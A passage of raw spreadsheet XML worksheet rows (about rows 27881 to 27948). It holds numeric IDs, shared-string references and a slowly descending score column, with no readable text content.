        <v>31502.0</v>
      </c>
      <c r="B27881" s="2">
        <v>5.0682317E7</v>
      </c>
      <c r="C27881" s="2" t="s">
        <v>26791</v>
      </c>
      <c r="D27881" s="2">
        <v>1.0</v>
      </c>
      <c r="E27881" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27881" s="2">
        <v>0.14030131826742</v>
      </c>
    </row>
    <row r="27882" ht="15.75" customHeight="1">
      <c r="A27882" s="1">
        <v>1247.0</v>
      </c>
      <c r="B27882" s="2">
        <v>2.511372E7</v>
      </c>
      <c r="C27882" s="2" t="s">
        <v>26792</v>
      </c>
      <c r="D27882" s="2">
        <v>1.0</v>
      </c>
      <c r="E27882" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27882" s="2">
        <v>0.1402116402116403</v>
      </c>
    </row>
    <row r="27883" ht="15.75" customHeight="1">
      <c r="A27883" s="1">
        <v>10732.0</v>
      </c>
      <c r="B27883" s="2">
        <v>1.5297904E7</v>
      </c>
      <c r="C27883" s="2" t="s">
        <v>26793</v>
      </c>
      <c r="D27883" s="2">
        <v>1.0</v>
      </c>
      <c r="E27883" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27883" s="2">
        <v>0.1400625978090767</v>
      </c>
    </row>
    <row r="27884" ht="15.75" customHeight="1">
      <c r="A27884" s="1">
        <v>18743.0</v>
      </c>
      <c r="B27884" s="2">
        <v>5.3739819E7</v>
      </c>
      <c r="C27884" s="2" t="s">
        <v>26794</v>
      </c>
      <c r="D27884" s="2">
        <v>1.0</v>
      </c>
      <c r="E27884" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27884" s="2">
        <v>0.14</v>
      </c>
    </row>
    <row r="27885" ht="15.75" customHeight="1">
      <c r="A27885" s="1">
        <v>8422.0</v>
      </c>
      <c r="B27885" s="2">
        <v>5.3927815E7</v>
      </c>
      <c r="C27885" s="2" t="s">
        <v>26795</v>
      </c>
      <c r="D27885" s="2">
        <v>1.0</v>
      </c>
      <c r="E27885" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27885" s="2">
        <v>0.1398809523809524</v>
      </c>
    </row>
    <row r="27886" ht="15.75" customHeight="1">
      <c r="A27886" s="1">
        <v>16296.0</v>
      </c>
      <c r="B27886" s="2">
        <v>4.5888319E7</v>
      </c>
      <c r="C27886" s="2" t="s">
        <v>26796</v>
      </c>
      <c r="D27886" s="2">
        <v>1.0</v>
      </c>
      <c r="E27886" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27886" s="2">
        <v>0.1398809523809524</v>
      </c>
    </row>
    <row r="27887" ht="15.75" customHeight="1">
      <c r="A27887" s="1">
        <v>24570.0</v>
      </c>
      <c r="B27887" s="2">
        <v>1.1316653E7</v>
      </c>
      <c r="C27887" s="2" t="s">
        <v>26797</v>
      </c>
      <c r="D27887" s="2">
        <v>1.0</v>
      </c>
      <c r="E27887" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27887" s="2">
        <v>0.1398809523809524</v>
      </c>
    </row>
    <row r="27888" ht="15.75" customHeight="1">
      <c r="A27888" s="1">
        <v>27165.0</v>
      </c>
      <c r="B27888" s="2">
        <v>2.084936E7</v>
      </c>
      <c r="C27888" s="2" t="s">
        <v>26798</v>
      </c>
      <c r="D27888" s="2">
        <v>1.0</v>
      </c>
      <c r="E27888" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27888" s="2">
        <v>0.1398809523809524</v>
      </c>
    </row>
    <row r="27889" ht="15.75" customHeight="1">
      <c r="A27889" s="1">
        <v>8490.0</v>
      </c>
      <c r="B27889" s="2">
        <v>5.404336E7</v>
      </c>
      <c r="C27889" s="2" t="s">
        <v>26799</v>
      </c>
      <c r="D27889" s="2">
        <v>1.0</v>
      </c>
      <c r="E27889" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27889" s="2">
        <v>0.1397569444444445</v>
      </c>
    </row>
    <row r="27890" ht="15.75" customHeight="1">
      <c r="A27890" s="1">
        <v>1291.0</v>
      </c>
      <c r="B27890" s="2">
        <v>2.5593249E7</v>
      </c>
      <c r="C27890" s="2" t="s">
        <v>26800</v>
      </c>
      <c r="D27890" s="2">
        <v>1.0</v>
      </c>
      <c r="E27890" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27890" s="2">
        <v>0.1392914653784219</v>
      </c>
    </row>
    <row r="27891" ht="15.75" customHeight="1">
      <c r="A27891" s="1">
        <v>11133.0</v>
      </c>
      <c r="B27891" s="2">
        <v>1.9181072E7</v>
      </c>
      <c r="C27891" s="2" t="s">
        <v>26801</v>
      </c>
      <c r="D27891" s="2">
        <v>1.0</v>
      </c>
      <c r="E27891" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27891" s="2">
        <v>0.1392914653784219</v>
      </c>
    </row>
    <row r="27892" ht="15.75" customHeight="1">
      <c r="A27892" s="1">
        <v>20197.0</v>
      </c>
      <c r="B27892" s="2">
        <v>1.0552735E7</v>
      </c>
      <c r="C27892" s="2" t="s">
        <v>26802</v>
      </c>
      <c r="D27892" s="2">
        <v>1.0</v>
      </c>
      <c r="E27892" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27892" s="2">
        <v>0.138888888888889</v>
      </c>
    </row>
    <row r="27893" ht="15.75" customHeight="1">
      <c r="A27893" s="1">
        <v>21142.0</v>
      </c>
      <c r="B27893" s="2">
        <v>1.8578058E7</v>
      </c>
      <c r="C27893" s="2" t="s">
        <v>26803</v>
      </c>
      <c r="D27893" s="2">
        <v>1.0</v>
      </c>
      <c r="E27893" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27893" s="2">
        <v>0.138888888888889</v>
      </c>
    </row>
    <row r="27894" ht="15.75" customHeight="1">
      <c r="A27894" s="1">
        <v>24286.0</v>
      </c>
      <c r="B27894" s="2">
        <v>1.0552734E7</v>
      </c>
      <c r="C27894" s="2" t="s">
        <v>26802</v>
      </c>
      <c r="D27894" s="2">
        <v>1.0</v>
      </c>
      <c r="E27894" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27894" s="2">
        <v>0.138888888888889</v>
      </c>
    </row>
    <row r="27895" ht="15.75" customHeight="1">
      <c r="A27895" s="1">
        <v>2846.0</v>
      </c>
      <c r="B27895" s="2">
        <v>3.5469118E7</v>
      </c>
      <c r="C27895" s="2" t="s">
        <v>26804</v>
      </c>
      <c r="D27895" s="2">
        <v>1.0</v>
      </c>
      <c r="E27895" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27895" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="27896" ht="15.75" customHeight="1">
      <c r="A27896" s="1">
        <v>5799.0</v>
      </c>
      <c r="B27896" s="2">
        <v>4.6784675E7</v>
      </c>
      <c r="C27896" s="2" t="s">
        <v>26805</v>
      </c>
      <c r="D27896" s="2">
        <v>1.0</v>
      </c>
      <c r="E27896" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27896" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="27897" ht="15.75" customHeight="1">
      <c r="A27897" s="1">
        <v>9702.0</v>
      </c>
      <c r="B27897" s="2">
        <v>5.6367707E7</v>
      </c>
      <c r="C27897" s="2" t="s">
        <v>26806</v>
      </c>
      <c r="D27897" s="2">
        <v>1.0</v>
      </c>
      <c r="E27897" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27897" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="27898" ht="15.75" customHeight="1">
      <c r="A27898" s="1">
        <v>14811.0</v>
      </c>
      <c r="B27898" s="2">
        <v>4.0931509E7</v>
      </c>
      <c r="C27898" s="2" t="s">
        <v>26807</v>
      </c>
      <c r="D27898" s="2">
        <v>1.0</v>
      </c>
      <c r="E27898" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27898" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="27899" ht="15.75" customHeight="1">
      <c r="A27899" s="1">
        <v>17538.0</v>
      </c>
      <c r="B27899" s="2">
        <v>5.0115629E7</v>
      </c>
      <c r="C27899" s="2" t="s">
        <v>26808</v>
      </c>
      <c r="D27899" s="2">
        <v>1.0</v>
      </c>
      <c r="E27899" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27899" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="27900" ht="15.75" customHeight="1">
      <c r="A27900" s="1">
        <v>32483.0</v>
      </c>
      <c r="B27900" s="2">
        <v>5.6973006E7</v>
      </c>
      <c r="C27900" s="2" t="s">
        <v>26809</v>
      </c>
      <c r="D27900" s="2">
        <v>1.0</v>
      </c>
      <c r="E27900" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27900" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="27901" ht="15.75" customHeight="1">
      <c r="A27901" s="1">
        <v>33969.0</v>
      </c>
      <c r="B27901" s="2">
        <v>9363213.0</v>
      </c>
      <c r="C27901" s="2" t="s">
        <v>26810</v>
      </c>
      <c r="D27901" s="2">
        <v>1.0</v>
      </c>
      <c r="E27901" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27901" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="27902" ht="15.75" customHeight="1">
      <c r="A27902" s="1">
        <v>13831.0</v>
      </c>
      <c r="B27902" s="2">
        <v>3.6772056E7</v>
      </c>
      <c r="C27902" s="2" t="s">
        <v>26811</v>
      </c>
      <c r="D27902" s="2">
        <v>1.0</v>
      </c>
      <c r="E27902" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27902" s="2">
        <v>0.1385372714486639</v>
      </c>
    </row>
    <row r="27903" ht="15.75" customHeight="1">
      <c r="A27903" s="1">
        <v>25936.0</v>
      </c>
      <c r="B27903" s="2">
        <v>1.5230735E7</v>
      </c>
      <c r="C27903" s="2" t="s">
        <v>26812</v>
      </c>
      <c r="D27903" s="2">
        <v>1.0</v>
      </c>
      <c r="E27903" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27903" s="2">
        <v>0.1385372714486639</v>
      </c>
    </row>
    <row r="27904" ht="15.75" customHeight="1">
      <c r="A27904" s="1">
        <v>3604.0</v>
      </c>
      <c r="B27904" s="2">
        <v>3.9093642E7</v>
      </c>
      <c r="C27904" s="2" t="s">
        <v>26813</v>
      </c>
      <c r="D27904" s="2">
        <v>1.0</v>
      </c>
      <c r="E27904" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27904" s="2">
        <v>0.1384742951907131</v>
      </c>
    </row>
    <row r="27905" ht="15.75" customHeight="1">
      <c r="A27905" s="1">
        <v>13855.0</v>
      </c>
      <c r="B27905" s="2">
        <v>3.6926585E7</v>
      </c>
      <c r="C27905" s="2" t="s">
        <v>26814</v>
      </c>
      <c r="D27905" s="2">
        <v>1.0</v>
      </c>
      <c r="E27905" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27905" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="27906" ht="15.75" customHeight="1">
      <c r="A27906" s="1">
        <v>3069.0</v>
      </c>
      <c r="B27906" s="2">
        <v>3.6519826E7</v>
      </c>
      <c r="C27906" s="2" t="s">
        <v>26815</v>
      </c>
      <c r="D27906" s="2">
        <v>1.0</v>
      </c>
      <c r="E27906" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27906" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="27907" ht="15.75" customHeight="1">
      <c r="A27907" s="1">
        <v>7847.0</v>
      </c>
      <c r="B27907" s="2">
        <v>5.2337799E7</v>
      </c>
      <c r="C27907" s="2" t="s">
        <v>26816</v>
      </c>
      <c r="D27907" s="2">
        <v>1.0</v>
      </c>
      <c r="E27907" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27907" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="27908" ht="15.75" customHeight="1">
      <c r="A27908" s="1">
        <v>19568.0</v>
      </c>
      <c r="B27908" s="2">
        <v>5.6135582E7</v>
      </c>
      <c r="C27908" s="2" t="s">
        <v>26817</v>
      </c>
      <c r="D27908" s="2">
        <v>1.0</v>
      </c>
      <c r="E27908" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27908" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="27909" ht="15.75" customHeight="1">
      <c r="A27909" s="1">
        <v>20392.0</v>
      </c>
      <c r="B27909" s="2">
        <v>1.2049919E7</v>
      </c>
      <c r="C27909" s="2" t="s">
        <v>26818</v>
      </c>
      <c r="D27909" s="2">
        <v>1.0</v>
      </c>
      <c r="E27909" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27909" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="27910" ht="15.75" customHeight="1">
      <c r="A27910" s="1">
        <v>24812.0</v>
      </c>
      <c r="B27910" s="2">
        <v>1.2049918E7</v>
      </c>
      <c r="C27910" s="2" t="s">
        <v>26819</v>
      </c>
      <c r="D27910" s="2">
        <v>1.0</v>
      </c>
      <c r="E27910" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27910" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="27911" ht="15.75" customHeight="1">
      <c r="A27911" s="1">
        <v>32933.0</v>
      </c>
      <c r="B27911" s="2">
        <v>6433471.0</v>
      </c>
      <c r="C27911" s="2" t="s">
        <v>26820</v>
      </c>
      <c r="D27911" s="2">
        <v>1.0</v>
      </c>
      <c r="E27911" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27911" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="27912" ht="15.75" customHeight="1">
      <c r="A27912" s="1">
        <v>12212.0</v>
      </c>
      <c r="B27912" s="2">
        <v>2.7642949E7</v>
      </c>
      <c r="C27912" s="2" t="s">
        <v>26821</v>
      </c>
      <c r="D27912" s="2">
        <v>1.0</v>
      </c>
      <c r="E27912" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27912" s="2">
        <v>0.1383838383838384</v>
      </c>
    </row>
    <row r="27913" ht="15.75" customHeight="1">
      <c r="A27913" s="1">
        <v>24334.0</v>
      </c>
      <c r="B27913" s="2">
        <v>1.0675055E7</v>
      </c>
      <c r="C27913" s="2" t="s">
        <v>26822</v>
      </c>
      <c r="D27913" s="2">
        <v>1.0</v>
      </c>
      <c r="E27913" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27913" s="2">
        <v>0.1383838383838384</v>
      </c>
    </row>
    <row r="27914" ht="15.75" customHeight="1">
      <c r="A27914" s="1">
        <v>28525.0</v>
      </c>
      <c r="B27914" s="2">
        <v>2.6756545E7</v>
      </c>
      <c r="C27914" s="2" t="s">
        <v>26823</v>
      </c>
      <c r="D27914" s="2">
        <v>1.0</v>
      </c>
      <c r="E27914" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27914" s="2">
        <v>0.1383838383838384</v>
      </c>
    </row>
    <row r="27915" ht="15.75" customHeight="1">
      <c r="A27915" s="1">
        <v>14416.0</v>
      </c>
      <c r="B27915" s="2">
        <v>3.9242947E7</v>
      </c>
      <c r="C27915" s="2" t="s">
        <v>26824</v>
      </c>
      <c r="D27915" s="2">
        <v>1.0</v>
      </c>
      <c r="E27915" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27915" s="2">
        <v>0.1380208333333334</v>
      </c>
    </row>
    <row r="27916" ht="15.75" customHeight="1">
      <c r="A27916" s="1">
        <v>14812.0</v>
      </c>
      <c r="B27916" s="2">
        <v>4.0931509E7</v>
      </c>
      <c r="C27916" s="2" t="s">
        <v>26825</v>
      </c>
      <c r="D27916" s="2">
        <v>1.0</v>
      </c>
      <c r="E27916" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27916" s="2">
        <v>0.137962962962963</v>
      </c>
    </row>
    <row r="27917" ht="15.75" customHeight="1">
      <c r="A27917" s="1">
        <v>24806.0</v>
      </c>
      <c r="B27917" s="2">
        <v>1.2032515E7</v>
      </c>
      <c r="C27917" s="2" t="s">
        <v>26826</v>
      </c>
      <c r="D27917" s="2">
        <v>1.0</v>
      </c>
      <c r="E27917" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27917" s="2">
        <v>0.137962962962963</v>
      </c>
    </row>
    <row r="27918" ht="15.75" customHeight="1">
      <c r="A27918" s="1">
        <v>25136.0</v>
      </c>
      <c r="B27918" s="2">
        <v>1.301877E7</v>
      </c>
      <c r="C27918" s="2" t="s">
        <v>26827</v>
      </c>
      <c r="D27918" s="2">
        <v>1.0</v>
      </c>
      <c r="E27918" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27918" s="2">
        <v>0.137962962962963</v>
      </c>
    </row>
    <row r="27919" ht="15.75" customHeight="1">
      <c r="A27919" s="1">
        <v>25206.0</v>
      </c>
      <c r="B27919" s="2">
        <v>1.3225422E7</v>
      </c>
      <c r="C27919" s="2" t="s">
        <v>26828</v>
      </c>
      <c r="D27919" s="2">
        <v>1.0</v>
      </c>
      <c r="E27919" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27919" s="2">
        <v>0.137962962962963</v>
      </c>
    </row>
    <row r="27920" ht="15.75" customHeight="1">
      <c r="A27920" s="1">
        <v>10948.0</v>
      </c>
      <c r="B27920" s="2">
        <v>1.707946E7</v>
      </c>
      <c r="C27920" s="2" t="s">
        <v>26829</v>
      </c>
      <c r="D27920" s="2">
        <v>1.0</v>
      </c>
      <c r="E27920" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27920" s="2">
        <v>0.1378968253968255</v>
      </c>
    </row>
    <row r="27921" ht="15.75" customHeight="1">
      <c r="A27921" s="1">
        <v>13450.0</v>
      </c>
      <c r="B27921" s="2">
        <v>3.5186909E7</v>
      </c>
      <c r="C27921" s="2" t="s">
        <v>26830</v>
      </c>
      <c r="D27921" s="2">
        <v>1.0</v>
      </c>
      <c r="E27921" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27921" s="2">
        <v>0.1378968253968254</v>
      </c>
    </row>
    <row r="27922" ht="15.75" customHeight="1">
      <c r="A27922" s="1">
        <v>30690.0</v>
      </c>
      <c r="B27922" s="2">
        <v>4254876.0</v>
      </c>
      <c r="C27922" s="2" t="s">
        <v>26831</v>
      </c>
      <c r="D27922" s="2">
        <v>1.0</v>
      </c>
      <c r="E27922" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27922" s="2">
        <v>0.1378968253968254</v>
      </c>
    </row>
    <row r="27923" ht="15.75" customHeight="1">
      <c r="A27923" s="1">
        <v>26110.0</v>
      </c>
      <c r="B27923" s="2">
        <v>1.5817462E7</v>
      </c>
      <c r="C27923" s="2" t="s">
        <v>26832</v>
      </c>
      <c r="D27923" s="2">
        <v>1.0</v>
      </c>
      <c r="E27923" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27923" s="2">
        <v>0.1376811594202899</v>
      </c>
    </row>
    <row r="27924" ht="15.75" customHeight="1">
      <c r="A27924" s="1">
        <v>18115.0</v>
      </c>
      <c r="B27924" s="2">
        <v>5.1753309E7</v>
      </c>
      <c r="C27924" s="2" t="s">
        <v>26833</v>
      </c>
      <c r="D27924" s="2">
        <v>1.0</v>
      </c>
      <c r="E27924" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27924" s="2">
        <v>0.1375227686703097</v>
      </c>
    </row>
    <row r="27925" ht="15.75" customHeight="1">
      <c r="A27925" s="1">
        <v>319.0</v>
      </c>
      <c r="B27925" s="2">
        <v>1.5709317E7</v>
      </c>
      <c r="C27925" s="2" t="s">
        <v>26834</v>
      </c>
      <c r="D27925" s="2">
        <v>1.0</v>
      </c>
      <c r="E27925" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27925" s="2">
        <v>0.1374269005847954</v>
      </c>
    </row>
    <row r="27926" ht="15.75" customHeight="1">
      <c r="A27926" s="1">
        <v>20097.0</v>
      </c>
      <c r="B27926" s="2">
        <v>9662696.0</v>
      </c>
      <c r="C27926" s="2" t="s">
        <v>26835</v>
      </c>
      <c r="D27926" s="2">
        <v>1.0</v>
      </c>
      <c r="E27926" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27926" s="2">
        <v>0.1374269005847954</v>
      </c>
    </row>
    <row r="27927" ht="15.75" customHeight="1">
      <c r="A27927" s="1">
        <v>12796.0</v>
      </c>
      <c r="B27927" s="2">
        <v>3.1396437E7</v>
      </c>
      <c r="C27927" s="2" t="s">
        <v>26836</v>
      </c>
      <c r="D27927" s="2">
        <v>1.0</v>
      </c>
      <c r="E27927" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27927" s="2">
        <v>0.1374269005847953</v>
      </c>
    </row>
    <row r="27928" ht="15.75" customHeight="1">
      <c r="A27928" s="1">
        <v>18535.0</v>
      </c>
      <c r="B27928" s="2">
        <v>5.3101175E7</v>
      </c>
      <c r="C27928" s="2" t="s">
        <v>26837</v>
      </c>
      <c r="D27928" s="2">
        <v>1.0</v>
      </c>
      <c r="E27928" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27928" s="2">
        <v>0.1372053872053872</v>
      </c>
    </row>
    <row r="27929" ht="15.75" customHeight="1">
      <c r="A27929" s="1">
        <v>4733.0</v>
      </c>
      <c r="B27929" s="2">
        <v>4.3324453E7</v>
      </c>
      <c r="C27929" s="2" t="s">
        <v>26838</v>
      </c>
      <c r="D27929" s="2">
        <v>1.0</v>
      </c>
      <c r="E27929" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27929" s="2">
        <v>0.1371527777777778</v>
      </c>
    </row>
    <row r="27930" ht="15.75" customHeight="1">
      <c r="A27930" s="1">
        <v>15002.0</v>
      </c>
      <c r="B27930" s="2">
        <v>4.1466355E7</v>
      </c>
      <c r="C27930" s="2" t="s">
        <v>26839</v>
      </c>
      <c r="D27930" s="2">
        <v>1.0</v>
      </c>
      <c r="E27930" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27930" s="2">
        <v>0.1370967741935484</v>
      </c>
    </row>
    <row r="27931" ht="15.75" customHeight="1">
      <c r="A27931" s="1">
        <v>25357.0</v>
      </c>
      <c r="B27931" s="2">
        <v>1.3569279E7</v>
      </c>
      <c r="C27931" s="2" t="s">
        <v>26802</v>
      </c>
      <c r="D27931" s="2">
        <v>1.0</v>
      </c>
      <c r="E27931" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27931" s="2">
        <v>0.1369731800766284</v>
      </c>
    </row>
    <row r="27932" ht="15.75" customHeight="1">
      <c r="A27932" s="1">
        <v>11245.0</v>
      </c>
      <c r="B27932" s="2">
        <v>2.0461257E7</v>
      </c>
      <c r="C27932" s="2" t="s">
        <v>26840</v>
      </c>
      <c r="D27932" s="2">
        <v>1.0</v>
      </c>
      <c r="E27932" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27932" s="2">
        <v>0.1369731800766283</v>
      </c>
    </row>
    <row r="27933" ht="15.75" customHeight="1">
      <c r="A27933" s="1">
        <v>14221.0</v>
      </c>
      <c r="B27933" s="2">
        <v>3.8283999E7</v>
      </c>
      <c r="C27933" s="2" t="s">
        <v>26841</v>
      </c>
      <c r="D27933" s="2">
        <v>1.0</v>
      </c>
      <c r="E27933" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27933" s="2">
        <v>0.1369731800766283</v>
      </c>
    </row>
    <row r="27934" ht="15.75" customHeight="1">
      <c r="A27934" s="1">
        <v>8111.0</v>
      </c>
      <c r="B27934" s="2">
        <v>5.3073417E7</v>
      </c>
      <c r="C27934" s="2" t="s">
        <v>26842</v>
      </c>
      <c r="D27934" s="2">
        <v>1.0</v>
      </c>
      <c r="E27934" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27934" s="2">
        <v>0.13681592039801</v>
      </c>
    </row>
    <row r="27935" ht="15.75" customHeight="1">
      <c r="A27935" s="1">
        <v>9072.0</v>
      </c>
      <c r="B27935" s="2">
        <v>5.5121804E7</v>
      </c>
      <c r="C27935" s="2" t="s">
        <v>26843</v>
      </c>
      <c r="D27935" s="2">
        <v>1.0</v>
      </c>
      <c r="E27935" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27935" s="2">
        <v>0.13681592039801</v>
      </c>
    </row>
    <row r="27936" ht="15.75" customHeight="1">
      <c r="A27936" s="1">
        <v>10309.0</v>
      </c>
      <c r="B27936" s="2">
        <v>5.7671533E7</v>
      </c>
      <c r="C27936" s="2" t="s">
        <v>26844</v>
      </c>
      <c r="D27936" s="2">
        <v>1.0</v>
      </c>
      <c r="E27936" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27936" s="2">
        <v>0.13681592039801</v>
      </c>
    </row>
    <row r="27937" ht="15.75" customHeight="1">
      <c r="A27937" s="1">
        <v>12961.0</v>
      </c>
      <c r="B27937" s="2">
        <v>3.2479956E7</v>
      </c>
      <c r="C27937" s="2" t="s">
        <v>26845</v>
      </c>
      <c r="D27937" s="2">
        <v>1.0</v>
      </c>
      <c r="E27937" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27937" s="2">
        <v>0.1366843033509701</v>
      </c>
    </row>
    <row r="27938" ht="15.75" customHeight="1">
      <c r="A27938" s="1">
        <v>31623.0</v>
      </c>
      <c r="B27938" s="2">
        <v>5144065.0</v>
      </c>
      <c r="C27938" s="2" t="s">
        <v>7957</v>
      </c>
      <c r="D27938" s="2">
        <v>1.0</v>
      </c>
      <c r="E27938" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27938" s="2">
        <v>0.1366843033509701</v>
      </c>
    </row>
    <row r="27939" ht="15.75" customHeight="1">
      <c r="A27939" s="1">
        <v>27121.0</v>
      </c>
      <c r="B27939" s="2">
        <v>2.0667371E7</v>
      </c>
      <c r="C27939" s="2" t="s">
        <v>26846</v>
      </c>
      <c r="D27939" s="2">
        <v>1.0</v>
      </c>
      <c r="E27939" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27939" s="2">
        <v>0.1365348399246705</v>
      </c>
    </row>
    <row r="27940" ht="15.75" customHeight="1">
      <c r="A27940" s="1">
        <v>22767.0</v>
      </c>
      <c r="B27940" s="2">
        <v>4483359.0</v>
      </c>
      <c r="C27940" s="2" t="s">
        <v>26847</v>
      </c>
      <c r="D27940" s="2">
        <v>1.0</v>
      </c>
      <c r="E27940" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27940" s="2">
        <v>0.1365348399246704</v>
      </c>
    </row>
    <row r="27941" ht="15.75" customHeight="1">
      <c r="A27941" s="1">
        <v>7093.0</v>
      </c>
      <c r="B27941" s="2">
        <v>5.0308061E7</v>
      </c>
      <c r="C27941" s="2" t="s">
        <v>26848</v>
      </c>
      <c r="D27941" s="2">
        <v>1.0</v>
      </c>
      <c r="E27941" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27941" s="2">
        <v>0.1363636363636364</v>
      </c>
    </row>
    <row r="27942" ht="15.75" customHeight="1">
      <c r="A27942" s="1">
        <v>25156.0</v>
      </c>
      <c r="B27942" s="2">
        <v>1.3065718E7</v>
      </c>
      <c r="C27942" s="2" t="s">
        <v>26849</v>
      </c>
      <c r="D27942" s="2">
        <v>1.0</v>
      </c>
      <c r="E27942" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27942" s="2">
        <v>0.1361111111111112</v>
      </c>
    </row>
    <row r="27943" ht="15.75" customHeight="1">
      <c r="A27943" s="1">
        <v>13153.0</v>
      </c>
      <c r="B27943" s="2">
        <v>3.3819031E7</v>
      </c>
      <c r="C27943" s="2" t="s">
        <v>26850</v>
      </c>
      <c r="D27943" s="2">
        <v>1.0</v>
      </c>
      <c r="E27943" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27943" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="27944" ht="15.75" customHeight="1">
      <c r="A27944" s="1">
        <v>29476.0</v>
      </c>
      <c r="B27944" s="2">
        <v>3.239986E7</v>
      </c>
      <c r="C27944" s="2" t="s">
        <v>26851</v>
      </c>
      <c r="D27944" s="2">
        <v>1.0</v>
      </c>
      <c r="E27944" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27944" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="27945" ht="15.75" customHeight="1">
      <c r="A27945" s="1">
        <v>29884.0</v>
      </c>
      <c r="B27945" s="2">
        <v>3607007.0</v>
      </c>
      <c r="C27945" s="2" t="s">
        <v>26852</v>
      </c>
      <c r="D27945" s="2">
        <v>1.0</v>
      </c>
      <c r="E27945" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27945" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="27946" ht="15.75" customHeight="1">
      <c r="A27946" s="1">
        <v>30246.0</v>
      </c>
      <c r="B27946" s="2">
        <v>3.7546941E7</v>
      </c>
      <c r="C27946" s="2" t="s">
        <v>26853</v>
      </c>
      <c r="D27946" s="2">
        <v>1.0</v>
      </c>
      <c r="E27946" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27946" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="27947" ht="15.75" customHeight="1">
      <c r="A27947" s="1">
        <v>3071.0</v>
      </c>
      <c r="B27947" s="2">
        <v>3.6528518E7</v>
      </c>
      <c r="C27947" s="2" t="s">
        <v>26854</v>
      </c>
      <c r="D27947" s="2">
        <v>1.0</v>
      </c>
      <c r="E27947" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27947" s="2">
        <v>0.1355555555555556</v>
      </c>
    </row>
    <row r="27948" ht="15.75" customHeight="1">
      <c r="A27948" s="1">
        <v>29091.0</v>
      </c>
